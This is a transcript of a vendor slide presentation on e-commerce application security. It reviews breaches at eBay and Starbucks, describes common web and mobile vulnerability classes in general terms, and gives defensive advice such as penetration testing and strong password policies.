Presentation is loading. Please wait.

Presentation is loading. Please wait.

E-commerce Application Security

Published byMagdalen Carr Modified over 5 years ago

Similar presentations

Presentation on theme: "E-commerce Application Security"— Presentation transcript:

1 E-commerce Application Security
Ways to secure your application from hackers Building a software is easy, building a secure software is difficult…. Vulnerabilities are inevitable, hacking is not…

2 You can also view a recorded session of this presentation here!
What is it all about ?? Importance of security in e-commerce Major attacks on e-commerce applications Common issues and vulnerabilities in applications What makes attackers target your application? Vulnerabilities that might be present in your application How do hackers attack your application? Do's and Dont's to improve application security You can also view a recorded session of this presentation here!

3 How security affects e-commerce?
Tarnishes company’s reputation in public Huge financial loss due to post breach activities like notification, patching, business loss etc. Image One breach invites many other hackers Loss of costumers trust Loss of business You can also view a recorded session of this presentation here!

4 Ecommerce Hacks What does eBay, Zappos (Amazon), Dominos and Starbucks have in common? They all suffered huge data breaches in the last few years. For more info checkout: Link

5 You can also view a recorded session of this presentation here!
eBay Data Breach Attackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network The attack obtained user information such as dates of birth, names, addresses, phone numbers, residential addresses and passwords (encrypted) Lessons to learn from this hack: Centralize Application Management Secure Employee Personal Accounts Ensure strong password policy Proactive stand for security You can also view a recorded session of this presentation here!

6 You can also view a recorded session of this presentation here!
Starbucks Data Breach Starbucks mobile app was hacked twice in a period of few months Hackers stole money from several Starbucks customers by gaining access to their credit card information Criminals used Starbucks accounts to access consumers’ linked credit cards. They could steal hundreds of dollars in a matter of minutes. Lessons to learn from this hack: Securing the mobile application and backend API Proactive measure against the cyber attacks, like Penetration testing and vulnerability assessments You can also view a recorded session of this presentation here!

7 Commonly Exploited Vulnerabilities
Injection Attacks like Sql Injection, leads to critical data loss Improper implementation of payment system and logical vulnerabilities X0RC0NF presentation: Link Insecure mobile application and backend API server Insecure direct object reference: Unrestricted access to subdomains Privilege Escalation and authorization bypass Cross Site Scripting: Hijacking accounts Improper Policy implementations, like weak passwords, insecure storage You can also view a recorded session of this presentation here!

8 You can also view a recorded session of this presentation here!
Injection Attacks Injection attacks can result in data loss or corruption, lack of accountability, denial of access or complete host takeover. For e.g., Sql injection may lead to total compromise of your database. You can also view a recorded session of this presentation here!

9 Payment system and logical vulnerabilities
Payment gateways are often found to be insecurely implemented that may lead to attacks like Payment forgery or restrictions bypass. Logical vulnerabilities are hard to discover but have huge impact on business. You can also view a recorded session of this presentation here!

10 Insecure mobile application and backend API server
Protecting only the web applications from hackers is not sufficient. With the increased use of smart phones and tablets, the internet is flooded with mobile applications. These applications must also be secured from attacks along with proper implementations of API calls. Source: nerdwallet.com You can also view a recorded session of this presentation here!

11 Insecure direct object reference
Insecure direct object reference means referencing an object such as a page or a file directly that was not meant to be directly referenced. Such insecure entry points are often discovered in applications while performing a pentest. Source: slideshare.net You can also view a recorded session of this presentation here!

12 Privilege Escalation and authorization bypass
Privilege Escalation enables the attacker to compromise an user’s account by accessing those resources that are meant to be private. If the compromised account is that of an administrator, the attacker now controls the admin functionalities. Source: cyber-security-blog.com You can also view a recorded session of this presentation here!

13 You can also view a recorded session of this presentation here!
Cross Site Scripting Attackers can execute scripts in a victim’s browser to hijack user sessions and steal cookies. This is one of the most common attack vectors that attackers use to steal credentials/tokens and perform targeted attacks Source: lifas.com You can also view a recorded session of this presentation here!

14 Improper Policy implementations- A Weak Password
A weak password policy that allows the users to set a weak password makes the application vulnerable to attacks such as brute force and Password guessing. Source: betanews.com

15 You can also view a recorded session of this presentation here!
Hacker’s Jackpot Credit card data, personal info like, phone number, address can be sold in black market Personal Info can be used for blackmailing and phishing Un-encrypted database can be sold very easily to competitors “If you're customer, u may want to know that we have offered Domino's not to publish your data in exchange for €30,000,” -Tweet by hackers after Dominos Hack Financial services are amongst top 3 of most attacked services on internet -2015-DBIR (Verizon) You can also view a recorded session of this presentation here!

16 You can also view a recorded session of this presentation here!
What Hacker’s look for? Unpatched servers, or network devices Insecure vulnerable implementation of known software's like WordPress Older/outdated software being used, with known publicly available exploits Common vulnerabilities like CSRF, XSS, lack of HTTPS, brute-forcing etc. Subdomains without proper authorization or public sensitive data “In our experience, 30-45% or applications have one or more than one critical vulnerability.” 47% of all breaches in 2015 study were caused by malicious or criminal attacks. -DBIR (Verizon) You can also view a recorded session of this presentation here!

17 You can also view a recorded session of this presentation here!
How hackers attack? Choosing the weakest link to attack, web application, unpatched servers, employee credentials etc. Finding the vulnerability in web application to steal credentials or users and exploit One XSS in any page may lead to admin account compromise Search for any vulnerable implementation of known software like WordPress or Magento Hacking a weak WordPress blog is way easier than hacking the website itself Data exfiltration is done in an stealth mode You can also view a recorded session of this presentation here!

18 You can also view a recorded session of this presentation here!
Safeguarding It might be dark, but the light is not very far  Proactively discover and remediate the application vulnerabilities in a timely manner A good penetration test will discover logical vulnerabilities and authorization issues too Make sure to assess all the subdomains, servers and all accessible portals. It’s not hidden if you have not provided a direct link Doing a small Google search will reveal many sub-domains “site:xyz.com -www” Ensure strong encryption and policy to be implemented on application and network Easy to find vulnerabilities affect the most, if not fixed. XSS, CSRF, file uploads etc. Always audit the application server together with the web application Mobile applications are becoming the easy target for hackers, make sure to assess it for vulnerabilities You can also view a recorded session of this presentation here!

19 Ways to Enhance the Security of Your E-commerce Applications
MORE INSIGHTS……. To know more about, Application Security in E-commerce apps WEBINAR RECORDING Ways to Enhance the Security of Your E-commerce Applications VIEW NOW

20 Contact Us We are keen to know about your idea info@tothenew.com
us at: Our Office Client Location 20

Download ppt "E-commerce Application Security"

Similar presentations

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
Cyber Stalking Cyber Stalking Phishing Hacker 1. Never reveal your home address !!! This rule is especially important for women who are business professionals.

Cyber Stalking Cyber Stalking Phishing Hacker 1. Never reveal your home address !!! This rule is especially important for women who are business professionals.
INADEQUATE SECURITY POLICIES Each covered entity and business associate must have written polices that cover all the Required and Addressable HIPAA standards.

INADEQUATE SECURITY POLICIES Each covered entity and business associate must have written polices that cover all the Required and Addressable HIPAA standards.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
OWASP Web Vulnerabilities and Auditing

OWASP Web Vulnerabilities and Auditing
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.

Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
Emerging Trends: Cyber Threats Bryan Sheppard Cyber Security Defense Center.

Emerging Trends: Cyber Threats Bryan Sheppard Cyber Security Defense Center.
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.

8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
SiteLock Internet Security: Big Threats for Small Business.

SiteLock Internet Security: Big Threats for Small Business.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Citadel Security Software Presents Are you Vulnerable? Bill Diamond Senior Security Engineer

Citadel Security Software Presents Are you Vulnerable? Bill Diamond Senior Security Engineer
Norman SecureSurf Protect your users when surfing the Internet.

Norman SecureSurf Protect your users when surfing the Internet.
Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.

Security and Risk Management. Who Am I Matthew Strahan from Content Security Principal Security Consultant I look young, but I’ve been doing this for.
Evolving Threats. Application Security - Understanding the Problem DesktopTransportNetworkWeb Applications Antivirus Protection Encryption (SSL) Firewalls.

Evolving Threats. Application Security - Understanding the Problem DesktopTransportNetworkWeb Applications Antivirus Protection Encryption (SSL) Firewalls.

Similar presentations

Ads by Google